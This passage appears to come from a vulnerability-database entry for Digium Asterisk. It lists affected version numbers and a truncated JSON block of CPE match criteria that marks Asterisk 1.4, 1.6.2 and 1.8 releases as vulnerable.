digium	asterisk	1.4.17
digium	asterisk	1.4.18
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19.1
digium	asterisk	1.4.19.2
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20.1
digium	asterisk	1.4.21
digium	asterisk	1.4.21
digium	asterisk	1.4.21
digium	asterisk	1.4.21.1
digium	asterisk	1.4.21.2
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22.1
digium	asterisk	1.4.22.2
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23.1
digium	asterisk	1.4.23.2
digium	asterisk	1.4.24
digium	asterisk	1.4.24
digium	asterisk	1.4.24.1
digium	asterisk	1.4.25
digium	asterisk	1.4.25
digium	asterisk	1.4.25.1
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26.1
digium	asterisk	1.4.26.2
digium	asterisk	1.4.26.3
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27.1
digium	asterisk	1.4.28
digium	asterisk	1.4.28
digium	asterisk	1.4.29
digium	asterisk	1.4.29
digium	asterisk	1.4.29.1
digium	asterisk	1.4.30
digium	asterisk	1.4.30
digium	asterisk	1.4.30
digium	asterisk	1.4.31
digium	asterisk	1.4.31
digium	asterisk	1.4.31
digium	asterisk	1.4.32
digium	asterisk	1.4.32
digium	asterisk	1.4.33
digium	asterisk	1.4.33
digium	asterisk	1.4.33
digium	asterisk	1.4.33.1
digium	asterisk	1.4.34
digium	asterisk	1.4.34
digium	asterisk	1.4.34
digium	asterisk	1.4.35
digium	asterisk	1.4.35
digium	asterisk	1.4.36
digium	asterisk	1.4.36
digium	asterisk	1.4.37
digium	asterisk	1.4.37
digium	asterisk	1.4.38
digium	asterisk	1.4.38
digium	asterisk	1.4.39
digium	asterisk	1.4.39
digium	asterisk	1.4.39.1
digium	asterisk	1.4.39.2
digium	asterisk	1.4.40
digium	asterisk	1.4.40
digium	asterisk	1.4.40
digium	asterisk	1.4.40
digium	asterisk	1.4.40.1
digium	asterisk	1.4.40.2
digium	asterisk	1.4.41
digium	asterisk	1.4.41
digium	asterisk	1.4.41.1
digium	asterisk	c.3.0
digium	asterisk	c.3.1.0
digium	asterisk	c.3.1.1
digium	asterisk	c.3.2.2
digium	asterisk	c.3.2.3
digium	asterisk	c.3.3.2
digium	asterisk	c.3.6.2
digium	asterisk	c.3.6.3
digium	asterisk	c.3.6.4

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "522733A7-E89E-4BFD-AC93-D6882636E880",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7CCCB892-30CE-4BEF-904E-5D957F94D0EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F156798F-F2EF-4366-B17E-03165AB437D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EFBB9A6-DD1D-436E-919F-74A3E4F40396",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "054E34C8-B6A5-48C7-938E-D3C268E0E8BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1DCECA72-533A-4A95-AB19-20C5F09A1B01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0E2309F8-AFEE-4150-99D1-BA606432ED73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7785F282-BFA0-400A-8398-872ACCA4BF37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1278D3FB-78C6-4F7D-A845-0A93D4F6E2B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C00A6EFB-A848-46D3-AAD7-FD8140007E42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB6E3972-5C53-4B6D-BFE1-67E1122EA013",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F8B700A-FACB-4BC8-9DF2-972DC63D852B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "FFD31B9B-2F43-4637-BE56-47A807384BF3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "E6450D6B-C907-49E6-9788-E4029C09285F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "DDB0432E-024A-4C0C-87FF-448E513D2834",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "D6A6A343-FEA2-49E5-9858-455AE3B29470",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "D57B94E3-EA37-466C-ADC4-5180D4502FDD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc7:*:*:*:*:*:*",
              "matchCriteriaId": "64D35A89-6B21-4770-AA0F-424C5C91A254",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc8:*:*:*:*:*:*",
              "matchCriteriaId": "14817302-A34A-4980-B148-AEB4B3B49BE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "61FDFA96-E62A-413B-9846-F51F1F7349EC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DA924386-49F6-4371-B975-B1473EEA12F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B74A1B99-8901-4690-B994-1DAD3EFA5ABB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4253C7DD-3588-4B35-B96D-C027133BE93F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "24AE11DB-16D3-42BF-BC64-E8982107D35B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "53841D77-926C-4362-BC85-BD8B6AC4391D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "F98FD6E6-EDE9-437D-B7C2-2DB65B73D230",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "4BA6CA77-D358-4623-8400-78EFC47ADB7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B4E62DAB-45E0-4EAA-8E45-6D3757A679D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.15:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1355578C-B384-401A-9123-2789CBECAD0B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "3491F8DB-A162-4608-B5F9-5401FE058CEB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C52730A8-D96E-46C1-8905-1D78A93E9C84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6E5CD17-B14A-4BDB-BA75-261344FF6F25",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "63C8DBF5-6992-4618-BD2D-56F1F98EAE3C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEED6C07-CFB7-44DC-9A41-9B6271942123",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0864DAF9-B7FA-4018-99F4-F2A7AA6FBBB0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "694B257B-E73B-4534-B316-87284FA45534",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "418FD91F-014E-4529-8D72-D3FB27788EEA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "D213EC93-0D4F-4BD9-9F13-9A9E705135EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E9D2091-B292-4D6E-A91F-58D24BD5A5E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "CFF196A0-87E1-4DD2-8CDA-B19EB6F71312",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F59B7C5-8EF3-495E-9A91-9C96E6DF41E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.18:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D9020FF4-645B-4E98-8CB0-3F8DF7C5841B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.18.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "9FA6B65B-1D93-4028-BD85-8879D310B896",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E56DB29-571D-4615-B347-38CF4590E463",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "FC1188DA-6C27-48D2-9CE7-74D77B24EE9E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "A93B8F91-5C56-44DE-AE29-8468E853759F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "BF7F4D02-7C8E-403C-A53E-A5F8C07F33A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "D85031A3-3444-4650-905D-721F1EBAA24F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F0AC2B3-6E8A-4B26-8A6C-792D9E5072C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2BC8D6D4-A389-4A78-8DA8-351A9CB896E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E979AC4-58EA-4297-9F90-350924BBE440",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A58CCD3-4A0C-468B-85F2-59A52B7293A4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "3542DB91-8487-49D6-AA15-E8FD9D6B99D6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "6BA4F3F1-C3F1-4E15-A854-9BB84E33E4AB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "661D710E-79F0-4E98-B35B-ED0549D35C24",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "68291ADE-F9D1-427B-B150-FDA7F2F4788B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "7F80CBCB-F58D-4BE7-8E78-67E04C900D01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB61D32E-3400-480E-BD27-BA3F98F94427",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "D9154EDB-CAE6-4BB0-8D02-9EC2B81D93C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A432B0A7-F158-4B9C-97F6-6A29DB13EAFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "687C67CB-46AF-40C2-8A02-081C7F78568A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E8D6EC0-A61E-4DBC-A0C7-864E9C4BDA1A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "2EF7F65A-45FD-4586-901E-49B057100BB4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "300F158E-ED27-46C8-85E4-AA0AA6B201DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB6F04C0-3226-4D2C-97A3-39999483C62C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "30685A20-963A-48D4-B7D7-2C11C2C812AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "C54C3AAC-4D5D-4661-86AB-6849982E8C67",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F847916-89F1-4AA6-973D-6002C8B54EE8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "5359815E-671A-4DFD-9E99-8CF903A03C84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "E2EFBC9E-4DCA-43CB-93EB-6807E2383A98",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "98755B1B-CAD5-4AC5-8571-52E67C3A8274",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "C9D8C8FE-3D09-4F60-AD03-9D4439942141",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "902FBE4B-5237-43CD-8EB6-D2CAC0F30879",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "708DCACA-49EC-468D-81EC-CE5367F8A164",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "BA9E3314-7D23-414C-8187-16D807410B62",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D824ED7B-BAB6-4C0F-A6B0-A75AB072EC0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7A01CE63-F834-48B2-826D-2DAD1B4AE8C3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "88B9CC9D-3DC2-4674-BA52-4C6D4E2056C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "43F1849F-1230-45E7-B6A3-D6FC72EB0F11",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "873C9C7E-93A3-4269-B19C-AB33A21C1AC7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "457F2112-7C5E-4953-8F4C-117925D486DA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "BD15ADD6-D7FA-441A-A9BC-487BCC15F2A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "792A8901-B7B8-40E8-9258-6338B72770FD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "0E6C8F78-0C00-45A5-8FEB-2A4BD5AC1A37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F3E04247-C4EF-4C1B-B879-5C02986950D3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5E382FC8-4001-4058-9151-05AE98B4A35E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "11FECE6B-B6A6-4DDA-9019-9A10B05EC1F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "D9813D27-0688-4989-99EB-1DC0F82D59F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:*:*:*:*:*:*:*",
              "matchCriteriaId": "D4333904-9D21-4149-965F-F49F0A34BD85",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F7180626-F0FD-46F3-AD52-5C67525C4B46",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "85A1E3A3-C157-4F3D-9477-F63771E7F627",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "FEE739CC-7A9C-489E-BFC0-6257129C043D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "ADC0E947-A95A-44ED-8DED-CC769FF00569",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "DE52BD9F-3728-455C-BC45-1A4DB926FFE9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1EF82D41-9222-42D3-ADAD-94B4F950C63F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2AE9F181-A8E4-4700-A30F-211CDE251606",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B10AE4B-EC2D-4D5B-B842-50F5097A0650",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "83E854D0-17A2-473B-B7E8-41E6447C81DC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "47169133-3854-4D8F-B79E-3CC77A166EF0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "6071601F-CF37-4E66-9D6D-AFC3434C18AB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "2A575824-E005-4820-824A-4875594619E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "080C7089-5662-4A94-9842-C4A26095DA4B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7AE38697-0B16-4032-9234-CA263E4A9885",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24:*:*:*:*:*:*:*",
              "matchCriteriaId": "DCB18BE2-B073-429C-ABE7-B8305793DAE4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FA7216BA-A42F-4ED8-8086-B4FA483FDAB6",
